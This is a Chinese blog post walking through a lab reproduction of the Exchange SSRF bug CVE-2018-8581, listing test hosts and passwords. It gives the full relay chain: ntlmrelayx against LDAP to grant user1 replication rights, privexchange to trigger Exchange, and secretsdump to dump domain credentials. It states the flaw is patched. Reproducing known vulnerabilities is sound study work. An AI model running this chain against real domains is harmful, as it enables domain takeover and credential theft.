CVE-2018-8581漏洞复现

环境搭建

主机机器名ip用户密码版本
域控1ad1.test.com192.168.164.174administratorAa1234win2012r2
exchange2016-cu11mail1.test.com192.168.164.173administratorAa1234win2012r2
域内机器user.test.com192.168.164.129user1Uu1234.win2008r2
kali192.168.152.45192.168.164.128xxxxxxkali

漏洞复现

由于exchange机器账户默认可以配置

'DS-Replication-Get-Changes'     = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2

Exchange Windows Permissions,Exchange Trusted Subsystem都具备Write-ACL的权限。
Exchange Trusted Subsystem的成员包括Exchange机器用户
这里是ssrf的利用,由于这个ssrf使用的http协议,所以默认不需要签名,所以可以中继到域管配置账户拥有dcsync的权限
首先在kali上配置ntlm中继

proxychains python3 ntlmrelayx.py -t ldap://192.168.164.174 --escalate-user user1

之后触发,由于kali的ssl有些问题,使用windows

python privexchange.py -ah 192.168.30.204 -u user1 -d test.com -ev 2013 192.168.164.173 -p Uu1234.

之后
在这里插入图片描述
使用dcsync

proxychains python3 secretsdump.py test/user1:Uu1234.@192.168.164.174 -dc-ip 192.168.164.174

利用这个环境是只需要一个代理,如果不出网可以使用linux机器或者直接通过端口转发出网,一样的效果,

目前官方已经修复该漏洞

https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0686
https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2019-0724

参考文章

https://daiker.gitbook.io/windows-protocol/ntlm-pian/7#4-cve-2018-8581
https://github.com/dirkjanm/PrivExchange

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值